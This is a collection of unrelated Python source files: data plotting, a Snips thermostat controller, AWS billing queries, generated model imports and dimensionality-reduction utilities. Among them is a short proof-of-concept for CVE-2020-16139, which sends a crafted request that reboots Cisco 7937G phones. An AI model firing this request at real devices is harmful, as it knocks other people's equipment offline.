            y_axis_data = df[plot_parameter].sum() / 3600
        if (plot_parameter == cs.HOUR_SUMMARY_ERROR_RATE):
            y_axis_data = (1 - (float(df[cs.HOUR_SUMMARY_SUM_REQS_SUCCESS].sum()) / float(df[cs.HOUR_SUMMARY_SUM_ALL_REQS].sum())))
        y_axis_list.append(y_axis_data)
    # Calculating Percentages
    if (plot_parameter == cs.HOUR_SUMMARY_ERROR_RATE):
        min_error_rate = min(y_axis_list)
        percent_diff_t4 = (1 - (min_error_rate / y_axis_list[3])) * 100
        percent_diff_t5 = (1 - (min_error_rate / y_axis_list[4])) * 100
        print min_error_rate
        print y_axis_list
        print percent_diff_t4
        print percent_diff_t5
    if (plot_parameter == cs.HOUR_SUMMARY_AVG_LATENCY):
        print y_axis_list
        # Average when distributing the stack in two VMs and one VM
        # avg T1,T3,T6
        avg_t16 = (y_axis_list[0] + y_axis_list[5]) / 2
        # avg T2,T7
        avg_t27 = (y_axis_list[1] + y_axis_list[6]) / 2
        print "Analysis between full stack vm and separate vms"
        print 1 - (avg_t27 / avg_t16)
        # Analysis between separate vms and database as a service
        print "Analysis separate vms and database as a service"
        avg_t1 = y_axis_list[0]
        avg_t3 = y_axis_list[2]
        print 1 - (avg_t1 / avg_t3)
        # Analysis between container (azure) and separate vms and DBaaS
        print "Analysis between container (azure) and separate vms and DBaaS"
        avg_t8 = y_axis_list[7]
        avg_t6 = y_axis_list[5]
        print 1 - (avg_t6 / avg_t8)
        print "Provider Comparison"
        print "VMs distributed"
        avg_t1 = y_axis_list[0]
        avg_t6 = y_axis_list[5]
        print 1 - (avg_t1 / avg_t6)
        print "VMs full stack"
        avg_t2 = y_axis_list[1]
        avg_t7 = y_axis_list[6]
        print 1 - (avg_t2 / avg_t7)
    if (plot_parameter == cs.HOUR_SUMMARY_SUM_BYTES_TRANSFERRED):
        print y_axis_list
        # Bytes -> GiB (2**30) for the printed summary.
        gb_list = [i / math.pow(2,30) for i in y_axis_list]
        print gb_list
    x_axis_num = np.arange(1, len(x_axis_list) + 1)
    ax1.bar(x_axis_num, y_axis_list, align='center', color='grey', edgecolor='black', alpha=0.85)
    ax1.set_xticks(x_axis_num)
    ax1.set_xticklabels(x_axis_list, fontsize=20)
    # Y-axis label depends on the parameter being plotted.
    if (plot_parameter == cs.HOUR_SUMMARY_TIMESTAMP_DURATION):
        ax1.set_ylabel('Experiment Duration (h)', fontsize=20)
    elif (plot_parameter == cs.HOUR_SUMMARY_AVG_LATENCY):
        ax1.set_ylabel('Average Latency (s)', fontsize=20)
    elif (plot_parameter == cs.HOUR_SUMMARY_ERROR_RATE):
        ax1.set_ylabel('Average Error Rate', fontsize=20)
    elif (plot_parameter == cs.HOUR_SUMMARY_SUM_BYTES_TRANSFERRED):
        ax1.set_ylabel('Total Bytes Transferred', fontsize=20)
    else:
        ax1.set_ylabel(plot_parameter, fontsize=20)
    #ax1.set_xlabel('$T^{\mu}_{i}$', fontsize=15)
    ax1.grid(True)
    # NOTE(review): saving/showing is commented out, so this function currently
    # only prints; re-enable savefig to persist the chart.
    #fig1.savefig(plot_output_file, format='pdf')
    #print "Saving to %s" %(plot_output_file)
    #plt.show()
# Build the list of per-scenario hourly summary CSVs, then render each chart.
file_list = createFileList(cs.EXP_RESULTS_DATA_PATH, cs.EXP_RESULTS_DATA_SCENARIOS, cs.SUMMARY_HOURLY_RESULTS_OUTPUT_FILE_NAME + '.csv')
print file_list
#line_plot_summary_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_SUM_REQS_SUCCESS,
#                  cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_REQ_SUCCESS_FILE, '')
#bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_SUM_REQS_SUCCESS,
#                  cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_REQ_SUCCESS_FILE, cs.PLOT_RESULTS_TITLE_REQ_SUCCESS)
bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_AVG_LATENCY,
                  cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_LATENCY_FILE, cs.PLOT_RESULTS_TITLE_LATENCY)
bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_TIMESTAMP_DURATION,
                  cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_EXP_DURATION_FILE, cs.PLOT_RESULTS_TITLE_DURATION)
bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_SUM_BYTES_TRANSFERRED,
                  cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_BYTES_TRANSFERRED_FILE, cs.PLOT_RESULTS_TITLE_BYTES_TRANSFERRED)
#bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_SUM_RESP_500,
#                  cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_SERVER_FAILURE_FILE, cs.PLOT_RESULTS_TITLE_REQ_SERVER_FAILURE)
bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_ERROR_RATE,
                  cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_TRANSACTION_ERROR_RATE_FILE, cs.PLOT_RESULTS_TITLE_TRANSACTION_ERROR_RATE)
| StarcoderdataPython |
3368856 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
#
# Author: <NAME> 2018
# http://blog.onlinux.fr
#
#
# Import required Python libraries
import os
import logging
import logging.config
from thermostat import Thermostat
from thermostat import Constants
from hermes_python.hermes import Hermes
from snipshelpers.config_parser import SnipsConfigParser
# Fixing utf-8 issues when sending Snips intents in French with accents
import sys
# Python 2 only: force utf-8 default encoding so French intent strings decode.
reload(sys)
sys.setdefaultencoding('utf-8')
CONFIG_INI = "config.ini"
MQTT_IP_ADDR = "localhost"
MQTT_PORT = 1883
MQTT_ADDR = "{}:{}".format(MQTT_IP_ADDR, str(MQTT_PORT))
# Snips intent identifiers handled by this action.
THERMOSTAT = 'ericvde31830:thermostat'
THERMOSTATSET = 'ericvde31830:ZibaseThermostatSet'
THERMOSTATSHIFT = 'ericvde31830:thermostatShift'
THERMOSTATTURNOFF = 'ericvde31830:thermostatTurnOff'
THERMOSTATMODE = 'ericvde31830:thermostatMode'
# os.path.realpath returns the canonical path of the specified filename,
# eliminating any symbolic links encountered in the path.
path = os.path.dirname(os.path.realpath(sys.argv[0]))
configPath = path + '/' + CONFIG_INI
# Logging is configured from the same config.ini that holds the action settings.
logging.config.fileConfig(configPath)
logger = logging.getLogger(__name__)
def open_thermostat(config):
    """Build a Thermostat from the parsed config and log its current state.

    Reads the Zibase IP from the 'secret' section and every variable /
    scenario id from the 'global' section, falling back to hard-coded
    defaults when a section or key is missing.
    NOTE(review): some dict defaults and .get() fallbacks disagree (e.g.
    modevariable "29" vs '31') — confirm which default is intended.
    """
    ip = config.get(
        'secret', {
            "ip": "192.168.0.100"}).get(
        'ip', '192.168.0.100')
    tempVariableId = int(
        config.get(
            'global', {
                "tempvariable": "28"}).get(
            'tempvariable', '28'))
    setpointDayVariableId = config.get(
        'global', {
            "setpointdayvariable": "29"}).get(
        'setpointdayvariable', '29')
    setpointNightVariableId = config.get(
        'global', {
            "setpointnightvariable": "29"}).get(
        'setpointnightvariable', '30')
    modeVariableId = config.get(
        'global', {
            "modevariable": "29"}).get(
        'modevariable', '31')
    stateVariableId = config.get(
        'global', {
            "statevariable": "13"}).get(
        'statevariable', '13')
    thermostatScenarioId = config.get(
        'global', {
            "thermostatscenario": "17"}).get(
        'thermostatscenario', '17')
    thermostatProbeId = config.get(
        'global', {
            "thermostatprobeid": "13"}).get(
        'thermostatprobeid', '13')
    thermostat = Thermostat(
        ip,
        int(tempVariableId),
        int(setpointDayVariableId),
        int(setpointNightVariableId),
        int(modeVariableId),
        int(stateVariableId),
        int(thermostatScenarioId),
        int(thermostatProbeId))
    # Dump the freshly-read thermostat state for debugging.
    logger.debug(" Address ip zibase:{}".format(ip))
    logger.debug(" Indoor Temperature:{}".format(
        thermostat.tempStr(thermostat.getTemp() / 10.0)))
    logger.debug(" Thermostat Mode:{}".format(thermostat.getModeString()))
    logger.debug(" Thermostat State:{}".format(thermostat.getStateString()))
    logger.debug(" Thermostat runMode:{}".format(
        thermostat.getRunModeString()))
    logger.debug(" setpoint Day: {}°C".format(
        thermostat.getSetpointDay() / 10.0))
    logger.debug(" setpoint Night:{}°C".format(
        thermostat.getSetpointNight() / 10.0))
    return thermostat
def intent_received(hermes, intent_message):
    """Dispatch a received Snips intent to the matching thermostat action.

    Handles mode change, turn-off (night mode), absolute setpoint change and
    relative up/down shift, then ends the voice session with a French sentence.
    Uses the module-level `thermostat` created at startup.
    """
    intentName = intent_message.intent.intent_name
    sentence = 'Voilà c\'est fait.'
    logger.debug(intentName)
    for (slot_value, slot) in intent_message.slots.items():
        logger.debug('Slot {} -> \n\tRaw: {} \tValue: {}'
                     .format(slot_value, slot[0].raw_value, slot[0].slot_value.value.value))
    # --- Explicit mode change (auto / stop / hors gel / ...) -----------------
    if intentName == THERMOSTATMODE:
        thermostat.read()
        logger.debug("Change thermostat mode")
        if intent_message.slots.thermostat_mode:
            tmode = intent_message.slots.thermostat_mode.first().value
            logger.debug(
                "Je dois passer le thermostat en mode {}".format(tmode))
            sentence = "OK, je passe le thermostat en mode {}".format(tmode)
            # Invert Thermostat.mode dict first
            inv_mode = {value: key for key, value in Constants.mode.items()}
            logger.debug(inv_mode)
            if tmode in inv_mode:
                thermostat.setMode(inv_mode[tmode])
                thermostat.update()
            else:
                sentence = 'Désolée mais je ne connais pas le mode {}'.format(
                    tmode)
        hermes.publish_end_session(intent_message.session_id, sentence)
        return
    # --- "Turn off" => switch to night mode ----------------------------------
    if intentName == THERMOSTATTURNOFF:
        thermostat.read()
        logger.debug("Thermostat turnOff")
        if intent_message.slots.temperature_device:
            thermostat.setMode(48) # Turn nightMode on
            sentence = "Ok, je passe en mode nuit."
        logger.debug(sentence)
        hermes.publish_end_session(intent_message.session_id, sentence)
        return
    # --- Absolute setpoint change --------------------------------------------
    if intentName == THERMOSTATSET:
        logger.debug("Thermostat Set")
        thermostat.read()
        if intent_message.slots.temperature_decimal:
            temperature = intent_message.slots.temperature_decimal.first().value
            # NOTE(review): ".format," passes the bound method instead of
            # calling it — likely meant .format(temperature); confirm.
            logger.debug("Température reconnue:".format, (temperature))
            runMode = thermostat.getRunModeString()
            mode = thermostat.getModeString()
            # Pick which setpoint (day/night) to change from the current mode.
            if runMode == 'nuit' and 'jour' not in mode:
                thermostat.setSetpointNight(int(temperature))
                sentence = "Ok, je passe la consigne de {} à {} degrés".format(
                    runMode, str(temperature / 10.0))
            elif runMode == 'jour' and 'nuit' not in mode:
                thermostat.setSetpointDay(int(temperature))
                sentence = "Ok, je passe la consigne de {} à {} degrés".format(
                    runMode, str(temperature / 10.0))
            else:
                sentence = "Désolée mais je ne sais pas quelle consigne changer car le mode est {}".format(
                    mode)
            thermostat.update()
        hermes.publish_end_session(intent_message.session_id, sentence)
        return
    # --- Relative shift ("it's cold" / "it's warm") --------------------------
    if intentName == THERMOSTATSHIFT:
        if intent_message.slots.up_down:
            up_down = intent_message.slots.up_down.first().value
            action = up_down.encode('utf-8')
            if action is not None:
                setPoint = None
                runMode = thermostat.getRunModeString()
                mode = thermostat.getModeString()
                logger.debug("runMode: {}, Mode: {}".format(
                    runMode, mode
                ))
                if mode == 'stop' or mode == 'hors gel':
                    sentence = "Désolée mais nous sommes en mode {}. Je ne fais rien dans ce cas.".format(
                        mode)
                elif action == 'down':
                    # Lower the setpoint relevant to the current mode by 1 unit.
                    if runMode == 'jour' or 'jour' in mode:
                        thermostat.addSetpointDay(-1)
                        setPoint = str(thermostat.getSetpointDay()
                                       / 10.0).replace('.', ',')
                        sentence = "Nous sommes en mode {}, je descends donc la consigne de jour à {} degrés.".format(
                            mode, setPoint)
                    else:
                        thermostat.addSetpointNight(-1)
                        setPoint = str(thermostat.getSetpointNight()
                                       / 10.0).replace('.', ',')
                        sentence = "Nous sommes en mode {} économique, je descends donc la consigne de nuit à {} degrés.".format(
                            mode, setPoint)
                elif action == "up":
                    if 'nuit' not in mode and runMode == 'jour' or 'jour' in mode:
                        thermostat.addSetpointDay(1)
                        setPoint = str(thermostat.getSetpointDay()
                                       / 10.0).replace('.', ',')
                        sentence = "Nous sommes en mode {}, je monte la consigne de jour à {} degrés.".format(
                            mode, setPoint)
                    else:
                        # switch to mode tempo-jour
                        if runMode == 'nuit' and mode == 'automatique':
                            sentence = "Nous sommes en mode {} économique, je passe donc en mode tempo jour".format(
                                mode)
                        else:
                            sentence = "Nous sommes en mode {}, je passe donc en mode tempo jour".format(
                                mode)
                        thermostat.setMode(32)
                logger.debug("After action-> runMode: {} , mode: {}".format(
                    thermostat.getRunModeString(), thermostat.getModeString()))
            else:
                sentence = "Je n'ai pas compris s'il fait froid ou s'il fait chaud."
        else:
            sentence = "Je ne comprends pas l'action à effectuer avec le thermostat."
        logger.debug(sentence)
        hermes.publish_end_session(intent_message.session_id, sentence)
        return
# Entry point: connect to the MQTT bus, load the config, build the thermostat,
# then block handling intents forever.
with Hermes(MQTT_ADDR) as h:
    try:
        config = SnipsConfigParser.read_configuration_file(configPath)
    except BaseException:
        # Missing/unreadable config: open_thermostat() will fall back to defaults.
        config = None
    thermostat = None
    try:
        thermostat = open_thermostat(config)
        logger.info('Thermostat initialization: OK')
    except Exception as e:
        # NOTE(review): `zibase` is assigned but never used elsewhere — confirm
        # whether `thermostat = None` was intended here.
        zibase = None
        logger.error('Error Thermostat {}'.format(e))
    h.subscribe_intents(intent_received).start()
| StarcoderdataPython |
3251020 | import pandas as pd
from pandasql import sqldf
# Load the detailed AWS billing report and normalize column names:
# drop ':' from headers, rename UnBlended* to Cost/Rate, and make missing
# values literal "NULL" strings so SQL comparisons below can match them.
bill = pd.read_csv(
    filepath_or_buffer="/Users/jianxlin/Documents/PythonWorkspace/jnc-cmdb/cmdb-usage/tmp/309544246384-aws-billing-detailed-line-items-with-resources-and-tags-ACTS-Ningxia-2020-08.csv.zip")
bill.columns = bill.columns.str.replace(':', '')
bill.rename(columns={"UnBlendedCost": "Cost", "UnBlendedRate": "Rate"}, inplace=True)
bill.fillna("NULL", inplace=True)
usage_start_date = "2020-08-01 00:00:00"
usage_end_date = "2020-09-01 00:00:00"
# Total of the 'Rounding' record type, tagged with a project label.
sql = """
select sum(Cost) as Rounding
from bill
where RecordType = 'Rounding'
"""
rounding = sqldf(sql, {"bill": bill})
rounding["userproject"] = "aiops"
print(rounding)
def run(_sql=None, _bill=None):
    """Run _sql against _bill (exposed as table `bill` via pandasql), print the
    full result frame, and return it."""
    b = sqldf(_sql, {"bill": _bill})
    pd.set_option('display.max_rows', 10000)  # display limits; tune as needed
    pd.set_option('display.max_columns', 100)
    print(b)
    return b
# Rows without a SubscriptionId: tax, rounding and total summary lines.
# NOTE(review): `% locals()` is a no-op here (the string has no % specifiers)
# — confirm whether interpolation was intended.
sql = """
select *
from bill
where SubscriptionId = "NULL"
""" % locals()
print('SubscriptionId = "NULL" ')
run(sql, bill)
"""
RateId SubscriptionId PricingPlanId UsageType Operation AvailabilityZone ReservedInstance ItemDescription UsageStartDate UsageEndDate UsageQuantity BlendedRate BlendedCost Rate Cost ResourceId userName userkubernetes.io/service-name userproject
1494763 1,320,575,235.0000000000 309544246384 309,544,246,384.0000000000 LineItem 0 NULL 0.0000000000 NULL NULL NULL NULL NULL N 税金 VAT 类型 2020-08-01 00:00:00 2020-08-31 23:59:59 NULL NULL 10,374.7400000000 NULL 10,374.7400000000 NULL NULL NULL NULL
1494764 1,320,575,235.0000000000 309544246384 687,267,341,391.0000000000 LineItem 0 NULL 0.0000000000 NULL NULL NULL NULL NULL N 税金 VAT 类型 2020-08-01 00:00:00 2020-08-31 23:59:59 NULL NULL 43.3400000000 NULL 43.3400000000 NULL NULL NULL NULL
1494765 1,320,575,235.0000000000 309544246384 NULL Rounding NULL NULL NULL NULL NULL NULL NULL NULL NULL 由于整合账单和小时行项目计算流程,该行项目包含舍入错误。 NULL NULL NULL NULL 0.0025652967 NULL -2.5094690054 NULL NULL NULL NULL
1494766 1,320,575,235.0000000000 309544246384 NULL InvoiceTotal NULL NULL NULL NULL NULL NULL NULL NULL NULL 发票 1320575235 的总额 NULL NULL NULL NULL 184,053.6000000000 NULL 184,053.6000000000 NULL NULL NULL NULL
1494767 NULL 309544246384 309,544,246,384.0000000000 AccountTotal NULL NULL NULL NULL NULL NULL NULL NULL NULL 关联账户# 309544246384 总额 NULL NULL NULL NULL 183,287.8288184949 NULL 183,290.2815696986 NULL NULL NULL NULL
1494768 NULL 309544246384 687,267,341,391.0000000000 AccountTotal NULL NULL NULL NULL NULL NULL NULL NULL NULL 关联账户# 687267341391 总额 NULL NULL NULL NULL 765.7686162084 NULL 765.8278993068 NULL NULL NULL NULL
1494769 NULL 309544246384 NULL StatementTotal NULL NULL NULL NULL NULL NULL NULL NULL NULL 2020-08-01 00:00:00 - 2020-08-31 23:59:59 期间内的... NULL NULL NULL NULL 184,053.6000000000 NULL 184,053.6000000000 NULL NULL NULL NULL
""" | StarcoderdataPython |
69445 | <filename>2020/CVE-2020-16139/poc/pocsploit/CVE-2020-16139.py
import requests
# Vuln Base Info
def info():
    """Return static metadata (description, severity, references, CVSS) for CVE-2020-16139."""
    return {
        "author": "cckuailong",
        "name": '''Cisco 7937G Denial-of-Service Reboot Attack''',
        "description": '''A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.''',
        "severity": "high",
        "references": [
            "https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "cvss-score": "",
            "cve-id": "CVE-2020-16139",
            "cwe-id": ""
        },
        "metadata":{
            "vuln-target": "",
        },
        "tags": ["cve", "cve2020", "dos", "cisco"],
    }
# Vender Fingerprint
def fingerprint(url):
    # Stub: no vendor fingerprinting implemented — every target is treated as
    # a candidate and checked directly by poc().
    return True
# Proof of Concept
def poc(url):
    """Check whether `url` is vulnerable to CVE-2020-16139.

    Sends the crafted ``localmenus.cgi`` payload and inspects the response.
    Returns a dict that ALWAYS contains a boolean ``"success"`` key, plus
    ``"info"`` / ``"payload"`` details when the target looks vulnerable.
    """
    # Initialize up front so callers can always read result["success"].
    # (The original only set the key on match or exception, so a non-matching
    # response returned {} and callers hit a KeyError.)
    result = {"success": False}
    try:
        url = format_url(url)
        path = """/localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"""
        method = "POST"
        data = """"""
        headers = {}
        resp0 = requests.request(method=method, url=url + path, data=data, headers=headers,
                                 timeout=10, verify=False, allow_redirects=False)
        # Vulnerable devices echo the payload back in an XML response.
        if (resp0.status_code == 200) and ("""application/xml""" in str(resp0.headers)) and ("""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""" in resp0.text):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except Exception:
        # Narrowed from a bare except: network errors / timeouts mean the
        # check could not confirm the vulnerability.
        result["success"] = False
    return result
# Exploit, can be same with poc()
def exp(url):
    # For this DoS the exploit is identical to the PoC: one crafted request.
    return poc(url)
# Utils
def format_url(url):
    """Normalize a target URL: trim whitespace, ensure a scheme, drop trailing slashes."""
    cleaned = url.strip()
    has_scheme = cleaned.startswith(("http://", "https://"))
    if not has_scheme:
        cleaned = "http://" + cleaned
    return cleaned.rstrip("/")
1636944 | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 1.0.1.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .collection_info import CollectionInfo
from .repository_info import RepositoryInfo
from .team_project_info import TeamProjectInfo
from .vsts_info import VstsInfo
__all__ = [
'CollectionInfo',
'RepositoryInfo',
'TeamProjectInfo',
'VstsInfo',
]
| StarcoderdataPython |
3381639 | <reponame>jerrykcode/kkFileView
#
# This file is part of the LibreOffice project.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# This file incorporates work covered by the following license notice:
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed
# with this work for additional information regarding copyright
# ownership. The ASF licenses this file to you under the Apache
# License, Version 2.0 (the "License"); you may not use this file
# except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0 .
#
from ..common.ConfigGroup import ConfigGroup
class CGFax(ConfigGroup):
    """Configuration group for the Fax wizard: selected style, which sections
    get printed, sender/receiver address fields and footer options."""
    def __init__(self):
        self.cp_Style = int()
        # Toggles for the printed fax elements.
        self.cp_PrintCompanyLogo = bool()
        self.cp_PrintDate = bool()
        self.cp_PrintSubjectLine = bool()
        self.cp_PrintSalutation = bool()
        self.cp_PrintCommunicationType = bool()
        self.cp_PrintGreeting = bool()
        self.cp_PrintFooter = bool()
        # Free-text content fields.
        self.cp_CommunicationType = str()
        self.cp_Salutation = str()
        self.cp_Greeting = str()
        # Sender address data.
        self.cp_SenderAddressType = int()
        self.cp_SenderCompanyName = str()
        self.cp_SenderStreet = str()
        self.cp_SenderPostCode = str()
        self.cp_SenderState = str()
        self.cp_SenderCity = str()
        self.cp_SenderFax = str()
        self.cp_ReceiverAddressType = int()
        # Footer options.
        self.cp_Footer = str()
        self.cp_FooterOnlySecondPage = bool()
        self.cp_FooterPageNumbers = bool()
        # Template selection.
        self.cp_CreationType = int()
        self.cp_TemplateName = str()
        self.cp_TemplatePath = str()
16044 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# author: bigfoolliu
"""
web socket可用于实时聊天
"""
import websocket
if __name__ == '__main__':
    # Placeholder entry point — no behavior implemented yet.
    pass
| StarcoderdataPython |
3386883 | from __future__ import annotations
from Bio.Seq import MutableSeq, Seq, reverse_complement
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional, List, Dict, Mapping
import uuid
from kd_splicing.location.models import Location
from kd_common import logutil
_logger = logutil.get_logger(__name__)
@dataclass
class Gene:
    """A gene annotation tied to one sequence record."""
    # __slots__ mirrors the field list to keep instances compact.
    __slots__ = "uuid", "record_uuid", "locus_tag", "gene_id", "db_xref", "location"
    uuid: uuid.UUID          # unique id of this gene
    record_uuid: uuid.UUID   # presumably the owning Record.uuid — confirm
    locus_tag: Optional[str]
    gene_id: Optional[str]
    db_xref: Optional[str]
    location: Location
@dataclass
class Isoform:
    """A protein isoform (CDS product) of a gene."""
    __slots__ = "uuid", "gene_uuid", "protein_id", "product", "location", "translation", "src_gene_uuid", "rna_uuid"
    uuid: uuid.UUID
    gene_uuid: uuid.UUID             # presumably the owning Gene.uuid — confirm
    protein_id: Optional[str]
    product: Optional[str]
    location: Location
    translation: str                 # amino-acid sequence
    src_gene_uuid: Optional[uuid.UUID]
    rna_uuid: Optional[uuid.UUID]    # associated RNA, when known
@dataclass
class RNA:
    """An RNA transcript of a gene."""
    __slots__ = "uuid", "gene_uuid", "transcript_id", "location", "src_gene_uuid"
    uuid: uuid.UUID
    gene_uuid: uuid.UUID   # presumably the owning Gene.uuid — confirm
    transcript_id: Optional[str]
    location: Location
    src_gene_uuid: Optional[uuid.UUID]
@dataclass
class DBFile:
    """Provenance of an imported source file."""
    __slots__ = "uuid", "src_gb_file", "db_name"
    uuid: uuid.UUID
    src_gb_file: str   # path/name of the source GenBank file
    db_name: str
@dataclass
class Record:
    """One sequence record from a source file, with organism taxonomy."""
    __slots__ = "uuid", "file_uuid", "sequence_id", "organism", "taxonomy"
    uuid: uuid.UUID
    file_uuid: uuid.UUID   # presumably the owning DBFile.uuid — confirm
    sequence_id: str
    organism: str
    taxonomy: List[str]
@dataclass
class DBPart:
    """One shard of the database: entity maps keyed by uuid, plus counters
    and the warnings/errors collected while building it."""
    files: Dict[uuid.UUID, DBFile] = field(default_factory=dict)
    records: Dict[uuid.UUID, Record] = field(default_factory=dict)
    isoforms: Dict[uuid.UUID, Isoform] = field(default_factory=dict)
    rnas: Dict[uuid.UUID, RNA] = field(default_factory=dict)
    genes: Dict[uuid.UUID, Gene] = field(default_factory=dict)
    stats: Dict[str, int] = field(default_factory=lambda: defaultdict(int))
    errors: List[str] = field(default_factory=list)
    def warn(self, s: str) -> None:
        """Log a warning and record it in `errors` with a [WARN] prefix."""
        # Logger.warn() is a deprecated alias; use warning() instead.
        _logger.warning(s)
        self.errors.append("[WARN]: " + s)
    def exception(self, s: str) -> None:
        """Log the active exception (with traceback) and record it in `errors`."""
        _logger.exception(s)
        self.errors.append("[ERROR]: " + s)
@dataclass
class DB:
    """The merged database (same shape as DBPart) plus optional lookup indexes."""
    files: Dict[uuid.UUID, DBFile] = field(default_factory=dict)
    records: Dict[uuid.UUID, Record] = field(default_factory=dict)
    isoforms: Dict[uuid.UUID, Isoform] = field(default_factory=dict)
    rnas: Dict[uuid.UUID, RNA] = field(default_factory=dict)
    genes: Dict[uuid.UUID, Gene] = field(default_factory=dict)
    stats: Dict[str, int] = field(default_factory=lambda: defaultdict(int))
    errors: List[str] = field(default_factory=list)
    # Optional indexes; None until built elsewhere.
    protein_id_to_isoform: Optional[Mapping[str, uuid.UUID]] = None
    isoform_to_duplicates: Optional[Mapping[uuid.UUID, List[uuid.UUID]]] = None
| StarcoderdataPython |
3260185 | <gh_stars>1-10
# MIT License
#
# Copyright (c) 2019 <NAME>, <NAME>, <NAME>, <NAME>, <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from os.path import isfile
from shlex import split
from subprocess import Popen, PIPE, STDOUT
from sys import stdout
from sklearn.decomposition import PCA, TruncatedSVD
from sklearn.random_projection import johnson_lindenstrauss_min_dim, SparseRandomProjection
from umap import UMAP
from dpemu.utils import get_project_root
def run_ml_module_using_cli(cline, show_stdout=True):
    """Runs an external ML model using its CLI.
    Args:
        cline: Command line used to call the external ML model.
        show_stdout: True to print the stdout of the external ML model.
    Returns:
        A string containing the stdout of the external ML model.
    """
    # With show_stdout the child's stderr is merged into stdout so it is echoed too.
    if show_stdout:
        proc = Popen(split(cline), bufsize=0, stdout=PIPE, stderr=STDOUT, universal_newlines=True,
                     cwd=get_project_root())
    else:
        proc = Popen(split(cline), bufsize=0, stdout=PIPE, universal_newlines=True, cwd=get_project_root())
    chars = []
    # Read one character at a time so output can be echoed live while the
    # child is still running.
    while True:
        char = proc.stdout.read(1)
        # Empty read with a finished process means the stream is exhausted.
        if not char and proc.poll() is not None:
            print()
            break
        if char and show_stdout:
            stdout.write(char)
            stdout.flush()
        if char:
            chars.append(char)
    return "".join(chars)
def reduce_dimensions(data, random_state, target_dim=2):
    """
    Reduces the dimensionality of the data using UMAP for lower dimensions, PCA for higher dimensions and possibly
    even random projections if the number of dimension is over the limit given by the Johnson–Lindenstrauss lemma. Works
    for NumPy arrays.

    Args:
        data: The input data.
        random_state: Random state to generate reproducible results.
        target_dim: The targeted dimension.

    Returns:
        Lower dimension representation of the data.
    """
    pca_limit = 30
    jl_limit = johnson_lindenstrauss_min_dim(n_samples=data.shape[0], eps=.3)
    # Extremely wide data is first compressed with a sparse random projection
    # down to the Johnson-Lindenstrauss safe dimension.
    if data.shape[1] > jl_limit and data.shape[1] > pca_limit:
        projector = SparseRandomProjection(n_components=jl_limit, random_state=random_state)
        data = projector.fit_transform(data)
    # PCA then brings anything still wider than pca_limit down to pca_limit.
    if data.shape[1] > pca_limit:
        pca = PCA(n_components=pca_limit, random_state=random_state)
        data = pca.fit_transform(data)
    # UMAP performs the final non-linear embedding to the target dimension.
    umap = UMAP(n_components=target_dim, n_neighbors=30, min_dist=0.0, random_state=random_state)
    return umap.fit_transform(data)
def reduce_dimensions_sparse(data, random_state, target_dim=2):
    """
    Reduces the dimensionality of the data using UMAP for lower dimensions and TruncatedSVD for higher dimensions. Works
    for SciPy sparse matrices.

    Args:
        data: The input data.
        random_state: Random state to generate reproducible results.
